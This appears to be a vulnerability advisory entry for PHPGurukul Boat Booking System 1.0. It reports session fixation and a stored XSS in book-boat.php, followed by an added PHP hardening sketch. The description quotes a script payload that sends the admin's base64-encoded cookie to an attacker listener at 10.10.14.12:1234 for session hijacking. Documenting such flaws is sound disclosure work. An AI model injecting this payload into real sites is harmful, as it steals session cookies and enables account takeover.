| Title | PHPGurukul Boat Booking System 1.0 Session Fixation |
|---|---|
| Description | The session is being started (session_start()) without regenerating the session ID after login, which could expose the system to session fixation attacks. An attacker can force a session ID onto a victim and then hijack it after the victim logs in. Risk: If an attacker gets hold of the session ID (via XSS or other means), they could hijack the session and impersonate the user. Fix: After logging in, regenerate the session ID to prevent this attack. By injecting the `<script>var i=new Image(); i.src="http://10.10.14.12:1234/?cookie="+btoa(document.cookie);</script>` payload into the forms in book-boat.php, an attacker can inject an XSS payload. When the admin user signs in to check all-booking.php, the payload is triggered and the admin cookie is forwarded to the attacker's netcat listener; the cookie can then be used to log in as the admin user without needing any credentials. |
| Source | https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_session_fixation.md |
| User | jadu101 (UID 70632) |
| Submission | 17/10/2024 06:12 AM (2 years ago) |
| Moderation | 18/10/2024 09:17 PM (2 days later) |
| Status | Accepted |
| VulDB Entry | 280944 [PHPGurukul Boat Booking System 1.0 session_start weak authentication] |
| Points | 20 |
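
The fix named in the description (regenerate the session ID after login), sketched as an added example that is not code from the Boat Booking System or from the submitter. The function names and the `admin_id` session key are hypothetical, and the cookie flags and output encoding are added mitigations for the cookie theft the description reports.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; none of these names come from the application's source.

function start_hardened_session(): void
{
    // Refuse session IDs the server did not issue, so an attacker-chosen
    // ID planted on the victim is discarded instead of adopted.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');

    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,     // cookie is sent over HTTPS only
        'httponly' => true,     // document.cookie cannot read the session cookie
        'samesite' => 'Strict',
    ]);
    session_start();
}

function complete_login(string $password, string $storedHash, int $adminId): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    // Issue a fresh session ID and delete the pre-login session, so an ID
    // known to an attacker before authentication never becomes privileged.
    session_regenerate_id(true);
    $_SESSION['admin_id']   = $adminId;
    $_SESSION['login_time'] = time();
    return true;
}

function h(string $value): string
{
    // Encode user-supplied booking fields before they are written into an
    // admin listing, so stored markup is displayed as text, not executed.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
```

Call `start_hardened_session()` at the top of every page in place of a bare `session_start()`, and pass each stored booking field through `h()` when rendering it.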